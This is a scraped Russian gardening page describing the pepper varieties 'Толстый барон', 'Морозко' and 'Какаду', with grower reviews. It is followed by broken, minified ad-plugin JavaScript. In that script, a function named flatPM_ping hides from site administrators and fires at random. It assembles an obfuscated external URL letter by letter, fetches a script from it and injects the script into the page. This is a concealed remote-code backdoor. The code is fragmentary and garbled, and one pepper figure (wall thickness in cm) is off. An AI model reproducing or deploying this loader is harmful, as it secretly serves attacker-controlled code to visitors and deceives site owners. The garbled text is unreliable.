Растения вырастают невысокими, около 50 см в высоту, с объемной кроной, густой зеленью. При посадке нужно следить, чтобы на 1 кв. метре размещалось по 3-5 растений. Урожайность этого сорта высокая. С одного куста при должном уходе можно собрать до 2-3 кг урожая, а с 1 кв.метра до 10 кг. Сорт устойчив к вирусу табачной мозаики.

«Моя мама очень любит сладкий перец. Особенно ей нравятся крупные перцы с толстой стенкой. Поэтому специально для неё уже несколько лет выращиваю красный сладкий перец сорта «Толстый барон» . Стручки вырастают крупные, стенка толстая, сочная, маме очень нравится есть этот перец в сыром виде.»

«Я огородник уже с большим стажем. Перепробовала много разных сортов сладких перцев. И сейчас остановилась на четырех: Богатырь, Калифорнийское чудо, Бигмама и Толстый барон. Последний сажаю третий раз, именно из-за того, что он очень толстостенный, сочный и вкусный. Я бы не сказала, что он как то более прихотлив, как и другие перцы, (если вы хотите именно такие- крепкие, толстенькие, а не бледно-зеленые тощенькие худышки). Все хорошие сорта требуют укрытия, но ухода они требуют значительно меньше, чем томаты. Так и Толстый барон растёт не очень большим, но раскидистым кустиком, плоды у него ровные достаточно, очень редко сгибаются( если уж совсем расти начнёт между веточками). Вкусный сорт для еды в свежем виде и для лечо хорошо подходит.»

Александр, 50 лет

«Плоды действительно крупные и вкусные. Правда, парочка кустов у меня все-таки умерли, так и не понял почему. Но остальные выросли и хорошо плодоносили. Как было заявлено должно было получиться около 5 кг на квадратный метр. Но у меня получилось меньше. Может просто слишком близко посадил их. И тесновато кустам перцев там было.На следующий год посажу подальше друг от друга. Просто, когда сажал не думал, что такие большие кусты будут. В целом для средне-раннего сорта очень даже неплохо. Урожай был хороший. Кстати, пока созревает, он желтого цвета, а когда созрел то уже красного цвета.»

Перец Морозко — описание сорта

Отличительной особенность сорта «Морозко» является его устойчивость к низким температурам и резким её перепадам, отлично подходит для выращивания в регионах с прохладным климатом. Сорт раннего созревания, плодоносит уже через 100-110 дней. Плоды у сорта ярко- красного цвета, средних размеров, весом около 100 грамм. Созревание урожая происходит дружно, одновременно на кусту образовывается 5-7 плодов, этот сорт считается средним по урожайности, с одного квадратного метра посадки собирают 3-3,5 кг урожая. В зависимости от селекции плоды либо свисают вниз, либо растут остриём вверх. Поверхность у перцев гладкая, глянцевая, плоды имеют форму конуса. Толщина стенок плодов средняя 6-7 мм, но мякоть сочная, сладкая и ароматная.

Сеют перец на рассаду в феврале-начале марта, это зависит от того, куда будет высаживаться сорт в дальнейшем. Хотя растение холодоустойчивое, его высаживают не только на открытые участки, но и в теплицу, это дает возможность получить урожай раньше. В теплицу растения высаживают в конце апреля, на открытый грунт-в мае, после того, как перестанут наступать сильные заморозки. Растение вырастает до 80 см в высоту — это требует подвязки перцев, чтобы в дальнейшем защитить кусты от поломки, придать им устойчивость. Схема посадки 45х45см. Формирования куст не требует. Сорт устойчив к многим болезням и вредителям.

Для увеличения плодоносности перцев, необходимо удалять цветок на центральном стебле растения

Плоды этого сорта содержат рекордное количество аскорбиновой кислоты, витамина С, поэтому лучше их употреблять в свежем виде, использовать в приготовлении салатов, однако перец отлично подходит и для консервирования, фаршировки и тушения.

Перец Какаду — описание сорта

Сорт перца относится к гибридным сортам, по срокам созревания-средний (130-135 дней). Данный сорт выведен для выращивания в теплицах и закрытом грунте, на открытых участках выращивание возможно только в южных регионах страны. Плоды этого перца очень крупные, в длину могут достигать 25-30 см, вес достигает 500 грамм. Плоды ярко-красного цвета, вытянутые, заостренные книзу и слегка изогнутые, внешне напоминают форму клюва какаду. Встречается «Какаду» и ярко-жёлтого цвета, но характеристики плодов совпадают. Перцы имеют толстую стенку около 7-8 см, плоды сладкие, ароматные. Перец рекомендован как салатный, но для заготовок также пригоден.

Гибрид данного сорта выращивается рассадным методом, пикируется, затем высаживается в теплицу. Стоить учитывать, что растение очень высокое, достигает до 1,5 м в высоту, поэтому между растениями нужно оставлять расстояние 80 см, ширина между грядками- 45см. Учитывая высокорослость, кусты необходимо подвязывать. Урожайность перца очень высокая. На одном кусту созревает порядка 3 кг плодов. Перец не требует к себе особого ухода, достаточно придерживаться основных правил возделывания этой культуры.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};